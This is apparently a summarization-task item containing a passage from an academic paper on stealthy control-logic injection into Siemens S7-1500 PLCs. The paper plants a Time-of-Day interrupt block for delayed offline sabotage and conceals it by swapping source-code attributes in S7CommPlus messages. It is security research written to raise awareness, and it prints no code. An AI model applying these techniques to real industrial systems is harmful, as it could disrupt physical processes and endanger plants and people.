text
stringlengths 1.44k
84k
|
|---|
Summarize:
INDEX TERMS Programmable logic controllers, industrial control systems, injection attack, time-of-day block, of ine attack. I. INTRODUCTION Industrial Control Systems (ICSs) are used to automate critical control processes such as production lines, electrical power grids, oil and gas facilities, petrochemical plants, and others. Each ICS environment consists of two main sites: a control site and a eld site. Fig. 1 shows a typical ICS environment. The control center runs ICS services such as Human Machine Interfaces (HMIs) and engineering worksta- tions. The eld site has sensors, actuators, and Programmable Logic Controllers (PLCs) that are installed locally to monitor and control physical processes. The engineering workstation is used to con gure and program PLCs. It has a PLC vendor- speci c programming software to write control logic that de- nes how the PLC should control and maintain the physical process at a desired state. PLCs are offered by several vendorssuch as Siemens, Allen-Bradley, Mitsubishi, Schneider and Modicon. Each has its own proprietary rmware, program- ming language, communication protocols and maintenance software. In the past, when PLCs were rst introduced, it was un- common for them to be connected to the outer world and they were often running independently i.e., the PLC-based ICS environments were air-gapped. This separation is no longer possible due to new demands such as maximizing the pro ts, minimizing the costs, and achieving a better ef ciency [1]. Therefore, it is not surprising that most of modern ICS en- vironments are increasingly connected to corporate networks and no longer controlled/monitored on-site. Unfortunately, this higher connectivity has also enlarged the attack surface, and brought its security challenges allowing attacks that were This work is licensed under a Creative Commons Attribution 4.0 License. For more information, see https://creativecommons.org/licenses/by/4.0/ 146 VOLUME 3, 2022 FIG. 1. An example of an industrial control system environment. not existing in the times of the air-gapped industrial plants. Stuxnet [12], which targeted the Iranian uranium enrichment in 2010, played an important role in increasing awareness of security for industrial control systems. This attack showed that no plant is resilient to cyber-attacks and that PLCs could be potentially hacked causing disastrous damages. But since then, several other ICS have been successfully attacked, for example the Ukrainian power grid [17], the German steel Mill [22], TRITON [16], etc. In this work, we show that modern PLC-based ICS envi- ronments are not fully protected against control logic injec- tion attacks, and that these systems are still quite far from being completely secure. To this end, we present a new at- tack strategy that allows malicious adversaries to disrupt the physical process controlled by PLCs of ine i.e., without being connected to the target or to its network at the point zero for the attack. The main focus of our investigations is on Siemens devices, precisely the latest PLC models i.e., devices from S7- 1500 family, and the latest version of S7CommPlus protocol i.e., S7CommPlusV3. Our attack approach is structured into two main phases: 1) Patching the control logic program of a PLC with an interrupt, precisely with Time-of-Day (ToD) interrupt block using the speci c Organization Block 10 (OB10). This is done online i.e., when the adversary has access to the target device. During this phase, the patch has no impact, neither on the physical process nor on the execution process of the control logic program i.e., the patch is in the idle mode. 2) Activating the patch injected in the target later at a certain date and time. This is done of ine i.e., withoutthe need of being connected to the target PLC at the point zero for the attack. To conduct experiments for proving the research, a Fis- chertechnik training industry plant1controlled by an S7-1500 PLC was used to test our attack approach. Our new threat is network based, and can be successfully conducted by any attacker with network access to any S7-1500 PLC with a rmware V2.9.2 or lower. A. MOTIVATION The objective of this article is to introduce a new control logic injection on cryptographically secured PLCs that use sophisticated protection methods. The intention of discussing this new type of attack is to raise awareness for sophisticated attacks and to assist in determining new vulnerabilities and weaknesses existing in PLCs as they are running in millions of critical industrial plants, and play a major point of in- teracting between the cyber and physical world. Our main focus is to understand the attack vectors in the rst place, and show the security research community, engineers, and industrial vendors what the consequence of the vulnerabilities would be if they are exploited. To conduct a real-world attack scenario, we chose a device from Siemens S7-1500 family. Our selection is based on two factors. First, Siemens is the leading provider of industrial automation components and their SIMATIC families have approximately 30-40% of the industry market [23] [25]. Secondly, Siemens claimed that its newest PLCs generation is well-secure against various attacks, 1https://www. schertechnikwebshop.com/de-DE/ schertechnik- lernfabrik-4-0-24v-komplettset-mit-sps-s7-1500-560840-de-de VOLUME 3, 2022 147 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE and their new developed S7CommPlus protocol supports im- proved security measures like an advanced anti-replay mech- anism and a sophisticated integrity check. These two factors motivated us to show how the most secure PLCs in Siemens SIMATIC lines can be exploited by external adversaries, and how attackers can confuse the physical process even without being connected to the victim devices. This could lead to dis- astrous damages to the plants employing such compromised devices. The major bene t of our attack strategy is that, the time running the attack and the point in time, when it shall hit the victim can be fully decoupled. For example, if motivated adversaries want to collapse a certain system at a speci c date/time e.g., the day before elections, or the day before going to the stock market to harm a country or a company respectively, they have suf cient time to inject their malicious code very well in advance, and do not need to be successful with the attack just at the right time. B. PROBLEM STATEMENT Most of the injection attacks have two critical challenges: First is that the typical injection attacks are designed to gain access to the target or its network in very speci c circumstances i.e., when the security measure implemented is absent or disabled for a certain reason [2], [3], [5] [7], [9] [11], [13], [18], [29], [30], [34] for example, the security mean is being updated, the ICS operator is running some maintenance processes, other devices are being removed/replaced/added to the network, etc. The system is at high risk to get a malicious infection during these critical phases, but it is not operating in its normal state i.e., the physical process is more likely to be temporally off. Hence, if attackers manage successfully to gain access to the target device during these times, and perform their attacks right after that, they will, pretty likely, not impact the physical process. The second challenge is that after the ICS operator is done with the ongoing maintenance processes, he usually reactivates the security measure before re-operating the sys- tem once again. This allows him to reveal and prevent any attempt to inject the PLC if the attacker is still connected to the network. Our attack approach overcomes both challenges by patching the PLC with a malicious block at that point in time at which the attacker accesses the network success- fully, keeping the infection hidden in the PLC s memory, and lunching the attack at a later time on his will. This ensures that the attack is not being performed when the system is not operating normally or being detected by an introduced or reactivated security measure. It is also important to highlight that ICS operators are still able to reveal any infection or modi cation in the control logic program, by uploading and comparing both programs the one running on the PLC and the one running in the engineering software [10]. In this article, we also overcome this challenge by exploiting a vulnerability existing in the newest S7CommPlus protocol (explained in Section V) to hide the infection from the ICS operator i.e., who will always be shown the original code that runs on his engineering software whilst the PLC runs the attacker s code.C. ATTACKER MODEL Assumption: Our attacker model assumes that an attacker has access to the level-3 network of the Purdue Model2(i.e., control center network). This assumption is based on real- world ICS attacks e.g., TRITON [16] and Ukraine power grid attack [17] that gained access to the control center via a typical IT attack vector such as infected USB stick and social engineering attack. We also assume that the attacker has access to the PLC and its respective engineering software along with a packet-snif ng tool such as Wireshark.3After the level-3 network access, an attacker can make use of software and libraries to communicate with the target PLC over the network. As our assumptions have already been reported to hold true in reports on real world attacks, we are convinced that our attack is a realistic one. Attacker s goal: The attacker s goal is as follows: disrupting the physical process at a time when he is completely of ine, i.e., without being connected to the target or its network at the point zero for the attack, while the physical process of the target network is controlled by the infected PLC. In order to ensure achieving the overall goal, the injection may not be revealed by the ICS operator in the time between infecting the PLC and the attack launch date. In this work, we assume that an attacker achieves these goals if the following three tasks are accomplished: 1) patching the malicious code when the attacker is con- nected to the target s network. 2) keeping this infection hidden in the PLC s memory without being revealed. 3) disrupting the physical process at a later time when the attacker is completely of ine of the target s network. Attacker s capabilities: The attacker can employ one or more of these capabilities to achieve the goals mentioned earlier: 1) Eavesdropping: read any messages between two com- municating parties. 2) Fabrication: initiate conversation with any other party and compose/send a new message. 3) Interception: intercept messages, and block or mod- ify/resend them. D. CONTRIBUTIONS In this article, we take the attack approach presented in our former paper [10] one step further in the direction of ex- ploiting PLCs of ine, and extend our experiences to involve the modern S7-1500 PLCs that use S7CommPlusV3 protocol. Our main contributions in this article are summarized as fol- lows: 1) Extending our control logic injection attack approach presented in [10] from S7-300 to S7-1500 PLCs. 2) Hiding the malicious interrupt code in the PLC s mem- ory until the very moment determined by the attacker. 2https://www.goingstealthy.com/the-ics-prude-model/ 3https://www.wireshark.org/ 148 VOLUME 3, 2022 3) Disrupting the physical process controlled by the com- promised PLC of ine i.e., when the attacker is not con- nected to the target or its network. 4) Demonstrating our attack using a real Siemens S7- 1512SP controlling a Fischertechnik training factory. 5) Revealing two new vulnerabilities in the integrity protection method that S7-1500 PLCs and their S7CommPlus protocol use. The rest of this work is organized as follows. Section II provides an overview of control logic injection attacks and related work. Section III presents the technical background, followed by the description of the protection mechanism of the latest S7CommPlus protocol in Section IV. Our attack approach is presented and explained in details in Section V. In Section VI, we evaluate and discuss the impact of our attack, as well as suggest some possible mitigation methods. Finally, we conclude our work in Section VII. II. OVERVIEW AND RELATED WORK One of the recent threats targeting ICSs is the control logic in- jection attack. Such an attack involves modifying the original control logic running on a target PLC by engaging its engi- neering software, typically employing the man-in-the-middle approach [3] [5], [9], [10], [13], [30] [32]. The main vulnera- bility exploited in this type of attacks is the lack of authentica- tion measures in the PLC protocols. ICS vendors responded to this threat by providing their PLCs with passwords to protect the control logic from unauthorized access i.e., whenever an ICS supervisor attempts to access the control logic running in a PLC, the device rst requires an authentication to allow him to read/write the code. This is normally done via propri- etary authentication protocol. But, this solution is not fully preventing the controllers from being compromised. Previous academic efforts [2] [5], [9], [35] managed successfully to bypass the authentication and to access the control logic in different password-protected PLCs. The authors of the above- mentioned papers discussed two prime ways to bypass the authentication: either by extracting the hash of the password and then pushing it back to the PLC (known as a replay attack), or using a representative list of plain-text password, encoded-text password pairs to brute-force each byte of ine. Overall, protecting the control logic by password authenti- cation only failed. Attackers are still capable of accessing the PLCs program and manipulating the physical processes controlled by the exposed devices. In the research community there are two types of control logic injection attacks: traditional control logic injection and rmware injection. However, infecting a PLC rmware would be a challenging task in a real ICS environment as most PLC vendors protect their PLCs from unauthorized rmware updates by cryptographic methods e.g., digital signature, or allowing rmware updates only by local access (e.g., SD cards and USB). This work does not cover a rmware injection and only focuses on the traditional control logic injection attack. In the following, we classify the existing injection attacks aiming at disrupting the physical process into two groups. FIG. 2. Disrupting the physical process online. A. DISRUPTING THE PHYSICAL PROCESS ONLINE The attacks in this group are designed to modify the original control logic program by engaging its engineering software. The physical process controlled by the infected device is im- pacted right after the malicious code is successfully injected. Fig. 2 shows the attack sequence. The most well-known attack representing this kind is the one that was conducted on Iranian nuclear facilities in 2010, named as Stuxnet to sabotage centrifuges at a uranium enrich- ment plant. The Stuxnet attack [12], [20], [21] used a windows PC to target Siemens S7-300 and S7-400 PLCs that were con- nected to variable frequency drives. It infects the control logic of the PLCs to monitor the frequency of the attached motors, and launches an attack if the frequency is within a certain range (i.e., 807 Hz and 1,210 Hz). More recent examples of such attacks on ICS occurred in Ukraine [17], [19]. These attacks targeted the electrical distribution grid causing wide- spread blackouts. In 2014, the German federal of ce for infor- mation security also announced a cyber-attack at an unnamed steel mill [22]. The hackers manipulated and disrupted control systems to such a degree that a blast furnace could not be properly shot down, resulting in a massive damage. McLaugh- lin [45] conducted a control logic injection attack on a train interlocking program. The malicious program he introduced was reverse engineered using a format program. With the help of the decompiled program, he extracted the eld-bus ID that indicated the PLC vendor and model, and then retrieved clues about the process structure and operations. Afterwards he designed his own program that generates unsafe behaviors for the train e.g., causing con ict states for the train signals. As a real attack scenario, he targeted timing-sensitive signals and switches. In a follow up work, McLaughlin et al. [46] implemented SABOT. It required a high-level description of the physical process, for example, the plant contains two in- gredient valves and one drain valve . Such information could be got from public channels, and are similar for processes in the same industrial sector. With this information, SABOT generates a behavioral speci cation for the physical processes and used incremental model checking to search for a mapping between a variable within the program, and a speci ed physi- cal process. Using this map, SABOT compiled a dynamic pay- load customized for the physical process. Both studies were limited to Siemens PLCs, without illustrating many details on reverse engineering. Valentine [48] introduced attacks that could install a jump to a subroutine command, and modify the interaction between two or more ladders in a program. This could be disguised as an erroneous use of scope and linkage by a novice programmer. In 2015, Klick et al. [6] VOLUME 3, 2022 149 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE presented the injection of malware into the control logic of a SIMATIC PLC, without disrupting the service. The authors showed that a knowledgeable adversary with access to a PLC can download and upload code to it, as long as the code consists of MC7 bytecode. In a follow on work, Spenneberg et al. [7] introduced a PLC worm. The worm spreads inter- nally from one PLC to other target PLCs. During the infection phase, the worm scans the network for new target PLCs. A Ladder Logic Bomb malware written in ladder logic or one of the compatible languages was introduced in [8]. Such a malware is inserted by an attacker into existing control logic on PLCs. A group of researchers [9] demonstrated a remote attack on the control logic of PLCs. They were able to infect the PLC and to hide the infection from the engineering soft- ware at the control center. They implemented their attack on Schneider Electric Modicon M221, and its vendor-supplied engineering software SoMachine-Basic. Senthivel et al. [18] presented three control logic injection attacks where an at- tacker interferes with engineering operations of downloading and uploading PLC control logic. In the rst attack scenario, an attacker, placed in a man-in-the-middle position between a target PLC and its engineering software, injects malicious control logic to the PLC and replaces it with original control logic to deceive the engineering software when the uploading operation is requested. The second scenario that their paper presented is very similar to the rst scenario but differs in that an attacker uploads malformed control logic instead of the original control logic to crash the engineering software. The last scenario does not require a man-in-the-middle position, as the attack just injects crafted malformed control logic to the target PLC. Lei et al. [31] demonstrated a spear that can break the security wall of the S7CommPlus protocol that Siemens SIMATIC S7-1200 PLCs utilize. The authors rst used the Wireshark software to analyze the communications between the TIA Portal software and S7 PLCs. Then, they applied the reverse debugging software WinDbg4to break the encryption mechanism of the S7CommPlus protocol. Afterwards, they demonstrated two attacks. First a replay attack was performed to start and stop the PLC remotely. In the second attack sce- nario, the authors manipulated the input and output values of the victim causing a serious damage for the physical process controlled by the infected PLC. In 2021, researchers in [3] also showed that S7-300 PLCs are vulnerable to such attacks and demonstrated that exploiting the control logic running in a PLC is feasible. After they compromised the security mea- sures of PLCs, they conducted a successful injection attack and kept their attack hidden from the engineering software by engaging a fake PLC impersonating the real infected de- vice. Researches behind Rogue7 [30] were able to create a rogue engineering station which can masquerade as the TIA Portal to S7 PLCs, and to inject any messages favorable to the attacker. By understanding how cryptographic messages were exchanged, they managed to hide the code in the user memory, which is invisible to the TIA Portal engineering 4http://www.windbg.org/ FIG. 3. Disrupting the physical process of ine. station. In [44], a group of security researchers analyzed the anti-replay mechanism that the new S7 PLCs used, and man- aged successfully to steal an existing communication session and to make unauthorized changes to the PLC states. As a part of their experiments, they identi ed speci c bytes necessary to craft valid network packets, and demonstrated a successful replay attack on S7 PLCs. All the attacks mentioned above are limited and require that attackers are connected to the target at the point zero for the attack, which increases the possibility of being revealed by the ICS operators beforehand, or detected by security measures. B. DISRUPTING THE PHYSICAL PROCESS OFFLINE The attacks in this class are quite similar to the ones men- tioned in the prior class, but differs in that an adversary does not aim at attacking the physical process right after gaining access to the target device. Meaning that, he patches his ma- licious code once he accesses an exposed PLC, then closes any live connection with the target keeping his patch inside the PLC s memory in idle mode. Afterwards, he activates his patch and compromises the physical process at a later time he wishes even without being connected to the system network (see Fig. 3). To the best of our knowledge, only a few academic ef- forts discussing this new threat were published. Serhane et al. [47] focused on Ladder logic code vulnerabilities and bad code practices that may become the root cause of bugs and subsequently be exploited by attackers. They showed that attackers could generate uncertainly uctuating output vari- ables e.g., performing two timers to control the same output values could lead to a race condition. Such a scenario could result in a serious damage to the devices controlled, similar to Stuxnet [12]. Another scenario that the authors pointed out is that skilled adversaries could also bypass some functions, manually set certain operands to desired values, and apply empty branches or jumps. In order to achieve a stealthy modi- cation, attackers could use array instructions or user-de ned instructions, to log insert critical parameters and values. They also discussed that attackers could apply an in nite loop via jumps, and use nest timers and jumps to only trigger the attack at a certain time. We, in our former paper [10], presented a novel approach based on injecting the target PLC with a 150 VOLUME 3, 2022 FIG. 4. A typical S7 PLC Architecture. Time-Of-Day interrupt code, which interrupts the execution sequence of the control logic at the time the attacker sets. Our evaluation results proved that an attacker could confuse the physical process even being disconnected from the target system. Although our research work was only tested on an old S7-300 PLC, and was just aiming at forcing the PLC to turn into stop mode, the attack was successful and managed to interrupt executing the original control logic code running in the patched PLC. Such attacks are severer than the online ones as the PLC keeps executing the original control logic correctly without being disrupted for hours, days, weeks, months and even years until the very moment determined by the attacker. The only realistic way to reveal this kind of attack is that the ICS operator requests the program from the PLC and compares the online code running in the infected device with the of ine code that he has on the engineering station. But in this work, we overcome this challenge as illustrated later in Section V. III. TECHNICAL BACKGROUND In this section, we outline the architecture of a standard S7 PLC and its operating system, engineering software, user pro- gram, Time-of-Day interrupt, and S7Communication proto- cols. A. SIMATIC S7 PLC ARCHITECTURE Siemens produces several PLC product lines in the SIMATIC S7 family e.g., S7-300, S7-400, S7-1200, and S7-1500. All have the same architecture. Fig. 4 depicts a standard archi- tecture of an S7 PLC that includes input and output modules, power supply, and memory such as Random Access Mem- ory (RAM) and Electrically Erasable Programmable Read- only Memory (EEPROM). The rmware, known as Operating System (OS), as well as the user-speci c program is stored in the EEPROM. Input and Output devices such as sensors, switches, relays, and valves are connected with the input and output modules. The PLC is connected to a physical process; the input devices provide the current state of the process to FIG. 5. Overview of program execution, extracted from [43]. the PLC, which the PLC processes through its control logic, and controls the physical process accordingly via the output devices. The control logic that an S7 PLC runs is programmed and compiled into a lower representation of the code i.e., to MC7 or MC7+ bytecode for S7-300/S7-400 or S7-1200/S7- 1500 PLCs respectively. After the code being compiled by the engi- neering station, its blocks, in MC7/MC7+ format, are down- loaded and installed into the PLC via Siemens S7Comm or s7CommPlus protocol for S7-300/S7-400 or S7-1200/S71500 PLCs respectively. Then, the MC7/MC7+ virtual machine in the S7 PLC will dispatch the code blocks, interpret and exe- cute the bytecode. B. OPERATING SYSTEM (OS) Siemens PLCs run a real time OS, which initiates the cycle time monitoring. Afterwards, the OS cycles through four steps as shown in Fig. 5. In the rst step, the CPU copies the values of the process image of outputs to the output modules. In the second step, the CPU reads the status of the input modules and updates the process image of input values. In the third step, the user program is executed in time slices with a duration of 1 ms (ms). Each time slice is divided into three parts, which are executed sequentially: The operating system, the user program and the communication. The number of time slices depends on the complexity of the current user program and the events interrupting the execution of the program. In normal operation, if an event occurs, the block currently being executed is interrupted at a command boundary and a different organization block that is assigned to the particular event is called. Once the new organization block has been executed, the cyclic program resumes at the point at which it was interrupted. This holds true as the maximum allowed cycle time (150 ms by default) is not exceeded. In other words, if there are too many interrupt OBs called in the main OB1, the entire cycle time might be extended more than it is set in the PLC hardware con guration. Exceeding the maximum allowed execution cycle generates a software error, and the PLC calls a speci c block to handle this error i.e., OB80. VOLUME 3, 2022 151 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE FIG. 6. S7 PLC s user program blocks. There are two ways to handle with this error: 1) PLC turns to a stop mode if the OB80 is not loaded in the main program, 2) PLC executes the instructions that OB80 is programmed with e.g., an alarm. C. ENGINEERING SOFTWARE Siemens provides their Total Integrated Automation (TIA) Portal software to engineers for developing PLC programs. It consists of two main components. The STEP 7 as develop- ment environment for PLCs and WinCC to con gure Human Machine Interfaces (HMIs). Engineers are able to program PLCs in one of the following programming languages: Ladder Diagram (LAD), Function Block Diagrams (FBD), Structured Control Language (SCL), and Statement List (STL). D. USER PROGRAM S7 PLC programs are divided into the following units: Or- ganization Blocks (OBs), Functions (FCs), Function Blocks (FBs), Data Blocks (DBs), System Functions (SFCs), System Function Blocks (SFBs) and System Data Blocks (SDBs) as shown in Fig. 6. OBs, FCs and FBs contain the actual code, while DBs pro- vide storage for data structures, and SDBs for the current PLC con gurations. The pre x M, memory, is used for addressing the internal data storage. A simple PLC program consists of at least one organization block called OB1, which is comparable to the main () function in a traditional C program. In more complex programs, engineers can encapsulate code by using functions and function blocks. The only difference is an ad- ditional DB as a parameter for calling an FB. The SFCs and SFBs are built into the PLC. However, the operating system calls OB cyclically and with this call it starts cyclic execution of the user program. E. TIME-OF-DAY (TOD) INTERRUPTS ATime-of-Day (TOD) interrupt is executed at a con gured time, either one-time or periodically depending on the needs of interrupt e.g., every minute, hourly, daily, monthly, yearly, and at the end of the month. A CPU 1500 provides 20 organi- zation blocks with the numbers OB10 to 0B17 and after OB 123 for processing a TOD interrupt. To start a TOD interrupt, a user must rst set the start time and then activate the interrupt. He can carry out both activitiesseparately in the block properties, automatic con guration, or also with system functions, manual con guration. Activating the block properties means that the Time-of-Day interrupt is automatically started. However, in the following we illustrate both ways brie y: 1)Automatic con guration: The user adds an organization block with the event class Time-of-Day and enters the name, programming language, and number. He programs the OB10 with the required instructions to be executed when the inter- rupt occurs. 2)Manual con guration: In this method, the user uses sys- tem function blocks to set, cancel, and activate a Time-of-Day interrupt. He sets the necessary parameters for the interrupt in the main OB1, by using system function blocks while the interrupt instructions to be executed are programmed in OB10. [49] provides technical details to set and program Time-of-Day interrupts in S7-1500 PLCs. F. S7COMMUNICATION PROTOCOLS The S7 protocol de nes an appropriate format for exchanging S7 messages between devices. Its main communication mode follows a client-server pattern: the HMI or TIA Portal device (client) initiates transactions and the PLC (server) responds by supplying the requested data to the client, or by taking the action requested in the instruction. Siemens provides its PLCs with two different protocol avors: the older SIMATIC S7 PLCs implement an S7 avor that is identi ed by the protocol number 0x32 (S7comm), while the new generation PLCs im- plement an S7 avor that is identi ed by the protocol number 0x72 (S7CommPlus). The newer S7CommPlus protocol has three sub-versions: S7CommPlusV1, S7CommPlusV2, and S7CommPlusV3. In this article, we only focus on the S7CommPlusV3 Pro- tocol that is used in the newer versions of the TIA Portal from V13 on, and in the newer PLC S7-1500 rmware e.g., V1.8, 2.0, etc. This protocol requires that both the TIA Por- tal and the PLC support its features, and has more complex integrity protection mechanisms as illustrated in the next sec- tion. S7CommPlusV3 protocol is considered as the most se- cure protocol compared to the older S7CommPlus versions, i.e., S7CommPlusV1 and S7CommPlusV2. IV. S7COMMPLUSV3 PROTOCOL The S7CommPlusV3 protocol is used only by the newer ver- sion of the TIA Portal, and the S7-1500 PLCs. It supports var- ious operations that are performed by the TIA Portal software as follows: 1) Start/Stop the control program currently loaded in the PLC memory. 2) Download a control program to the PLC. 3) Upload the current control program from the PLC to the TIA Portal. 4) Read the value of a control variable. 5) Modify the value of a control variable. The above-mentioned operations are translated by the TIA Portal software to S7CommPlus messages before they are 152 VOLUME 3, 2022 FIG. 7. The S7 Session Key Establishment Mechanism. transmitted to the PLC. The PLC acts then on the messages it receives, executes the control operations, and responds back to the TIA Portal accordingly. The messages are transmitted in the context of a session, each session has a session ID chosen by the PLC. A session begins with a four-message handshake used to select the cryptographic attributes of the session in- cluding the protocol version and keys. After the handshake, all messages are integrity protected using a cryptographic protection mechanism as illustrated in the next subsection. A. THE S7 INTEGRITY PROTECTION MECHANISM Siemens integrated cryptographic protection in its newer S7 proprietary protocol in order to protect its PLCs from unau- thorized access. The new mechanism uses two main modules: 1)A session key exchange protocol that the two parties (PLC and TIA Portal) use to establish a secret shared key in each session. 2)Per-fragment message protection that calculates a Message Authentication Code (MAC) value. 1) S7 KEY EXCHANGE PROTECTION Siemens improved its S7CommPlus protocol by replacing the key generation process in the prior version, i.e., the S7CommPlusV2, by a more complex process in the newer version S7CommPlusV3. The new mechanism involves a new key exchange technique, that uses elliptic-curve public-key cryptography [33] as depicted in Fig. 7. FIG. 8. The Structure of the SecurityKeyEncriptedKey BLOB Data. The rst request message is a Hello message that the TIA Portal sends to initialize a new session. Then, the PLC re- sponds back with sharing its rmware version, model, Session ID, and speci c 20-bytes known as PLC_Challenge . The PLC rmware version determines the elliptic-curve public-key pair to be used in the key exchange. After the TIA Portal receives the second message from the PLC, it activates a derivation algorithm to randomly select a key Derivation Key (KDK ), and to generate the session key from the PLC_Challenge and the selected KDK . Afterwards, the TIA Portal transmits the key encrypted using Elliptic-Curve Cryptography (ECC) to the PLC over the third message. The third message contains, among other things, two main parts: a) A data structure called SecurityKeyEncryptedKey shown in Fig. 8, which contains the selected key encrypted with the PLC s public key. b) Two 8-bytes key ngerprints (additional key), of the PLC public key ID and the selected key, respectively. Finally, the PLC veri es the third message. If this is done successfully, it returns OK in the fourth message, and from this point on, all the following messages in the session are integrity protected with the derived Session Key. 2) PER-FRAGMENTATION MESSAGE PROTECTION When the TIA Portal downloads/uploads the control logic program to/from an S7-1500 PLC, the assigned S7CommPlus messages are fragmented to many small fragments sent over the TCP/IP packets. All messages exchanged between the two parties are integrity protected HMAC-SHA256 [27]. This integrity protection is applied at the fragment level. Meaning that, it replaces the signal MAC value at the end of each message, and a cryptographic digest is placed at each frag- ment between the fragment header and the fragment data as shown in Fig. 9. [27] presents more technical details about this protection mechanism. Although fragmenting the S7 messages was more chal- lenging for attackers, they eventually overcame this protec- tion mechanism and compromised the PLCs using this tech- nique. The vulnerability reported in [28] shows that attackers VOLUME 3, 2022 153 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE FIG. 9. S7CommPlus message with integrity protection at fragment level. could implement man-in-the-middle approach and managed successfully to modify the network traf c exchanged on port 102/TCP due to the certain properties in the calculation used for this integrity protection. B. S7COMMPLUS DOWNLOAD MESSAGES - OBJECTS AND ATTRIBUTES S7 is a request response protocol. Each request message con- sists of a request header, and a request set. The header con- tains a function code, which identi es the requested operation e.g., 0x31 for a download message (see Fig. 9). A single S7CommPlus message might contain multiple objects, each containing multiple attributes. All objects and attributes have unique class identi ers. However, the CreateObject request builds a new object in the PLC memory with a unique ID (in our example, 0x04ca ). The program download message then creates an object of the class ProgramCycleOB . This object contains multiple attributes, each one having values dedicated to a speci c purpose. For instance, the FunctionalObject.Code contains the binary executable code that the PLC runs i.e., the compiled program in the PLC s machine language (MC7+). The Block.AdditionalMac is used as an additional MAC value in the integrity process, and both Block.OptimizedInfo and Block.BodyDescription are equivalent to the program written by the ICS operator which are stored in the PLC and can be later uploaded, upon request, to a TIA Portal project. From the security point of view, these attributes are critical data that is transmitted over the S7CommPlusV3 protocol. Meaning that, if an attacker can intercept the S7 packets con- taining these attributes, and manage successfully to modifythem independently, he is able to cause a source-binary in- consistency as explained in detail in the next section. V. ATTACK DESCRIPTION As in any typical injection attack, we patch our malicious code, Time-of-Day interrupt block OB10, in the original con- trol logic of the target PLC. The CPU checks whether the condition of the interrupt is met in each single execution cycle. Meaning that, the attacker s interrupt block will be always checked but only executed if the date and time of the CPU s clock match the date and time set by the attacker. Hence, we have two cases: 1) The date of CPU s clock matches the date set in the OB10 (the date of the attack). The CPU immediately halts executing OB1, stores the breaking point s location in a dedicated register, and jumps to execute the content of the corresponding interrupt block OB10. 2) The date of the CPU s clock does not match the date set in OB10. The CPU resumes to execute OB1 af- ter checking the interrupt condition without activating the interrupt and without executing the instructions in OB10. Our attack approach presented in this paper is comprised of two main phases: the patching phase (online phase), and the attack phase (of ine phase). Please note that, getting the IP address, MAC address, and model of the victim PLC is an easy task by running our PN-DCP protocol based scanner presented in [5] or other network scanners that can obtain all the information that the attacker needs to communicate with the target device. 154 VOLUME 3, 2022 FIG. 10. High-level overview of the patching phase. A. PATCHING PHASE Fig. 10 shows a high-level overview of this phase. We aim at injecting the PLC with our malicious instructions pro- grammed in the interrupt block OB10. This phase consists of four steps: a) Uploading and downloading the user s program. b) Modifying and updating the control logic program. c) Crafting the S7CommPlus download message. d) Pushing the attacker s message to the victim PLC. To patch the target PLC, we utilize our MITM station which has two main components: 1)AT I AP o r t a l : to retrieve and modify the current control logic program that the PLC runs. 2)A PLCinjector: to download the attacker s code to the PLC. In this work, we developed a python script based on the Scapy5library for this purpose. For a realistic scenario, there are two possible cases that an attacker might encounter after accessing the network. 1) CASE_1: INACTIVE S7 SESSION In this scenario, the legitimate TIA Portal is of ine, and only communicates with the PLC if an upload process is required. Step 1. Uploading & Downloading the User s Program: In this step, we aim at obtaining the decompiled control logic program that the PLC runs, and the S7CommPlus message that the TIA Portal sends to download the original user pro- gram into the PLC. For achieving these goals, we open rst the attacker s TIA Portal and establish a connection with the victim PLC directly. This is possible due to a security gap in 5https://scapy.net/the S7-1500 PLC design. In fact, the PLC does not introduce any security check to ensure that the currently communicating TIA Portal is the same TIA Portal that it communicated with in an earlier session. For this, any external adversary provided with a TIA Portal on his machine can easily communicate with an S7 PLC without any effort. After successfully establishing the communication, we up- load the control logic program on the attacker s TIA Portal. Then we re-download it once again to the PLC and sniff the entire S7CommPlus messages ow exchanged between the attacker s TIA Portal and the victim PLC using the Wireshark software. At the end of this step, the attacker has the program on his TIA Portal, and all the captured download messages saved in a Pcap le for a future use (explained in step 3). Step 2. Modifying & Updating the PLC s Program: After retrieving the user program that the target PLC runs, the at- tacker s TIA Portal displays it in one of the high-level pro- gramming languages that it was programmed with (e.g., SCL). Based on our understanding to the physical process controlled by the PLC, we con gure and program our Time-of-Day interrupt block OB10 to force certain outputs of the system to switch off once the interrupt is being activated (shown later in Fig. 13). Although our malicious code differs from the original code with only an extra small size block (OB10), it is suf cient to confuse the physical process of our experimental set-up. The easiest way to update the program running in the PLC is to use the attacker s TIA Portal. When we downloaded the modi ed control logic, the PLC updated its program success- fully. But, the ICS operator could easily reveal the modi ca- tion by uploading the program from the infected PLC, and VOLUME 3, 2022 155 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE FIG. 11. Closing the online session using MITM Approach. FIG. 12. Experimental Set-up. comparing the of ine and online programs running on his legitimate TIA Portal and the remote PLC respectively. Step 3. Crafting the S7CommPlus Download Message: To hide our infection from the legitimate user, we rst recorded the S7CommPlus messages exchanged between the attacker s TIA Portal and the PLC while downloading the modi ed pro- gram. As mentioned earlier in Section IV.B, each download message has objects and attributes see Fig. 9. The Program- CycleOB object is dedicated to create a program cycle block in the PLC s memory and has three different attributes: a)Object MAC: donated with the item value ID: Block.AdditionalMac . b)Object Code: donated with the item value ID: Function- alObject.code . c)Source Code: donated with the item value ID: Block.BodyDescription . The Object Code is the code that the PLC reads and pro- cesses, whilst the Source Code is the code that the TIA Portal FIG. 13. The malicious instructions in OB10. decompiles, reads, and displays for the user. Therefore, all what is required to show the user the original code is to modify the S7CommPlus message that the attacker sends; by replacing the Source Code attribute of the ProgramCycleOB object of the attacker s program with the Source Code attribute of the ProgramCycleOB object of the original program. Our investigation showed that the newest model of the SIMATIC PLCs has a serious design vulnerability. The PLC checks the session freshness by running a precaution measure. Hence, it can detect any manipulation and refuses to update its program in case the attributes do not belong to the same session. But surprisingly, this holds true only for the Object MAC and the Object Code attributes. Meaning that, to make the PLC ac- cept the crafted message, our crafted S7CommPlus download message must always have the Object MAC and the Object Code attributes from the same 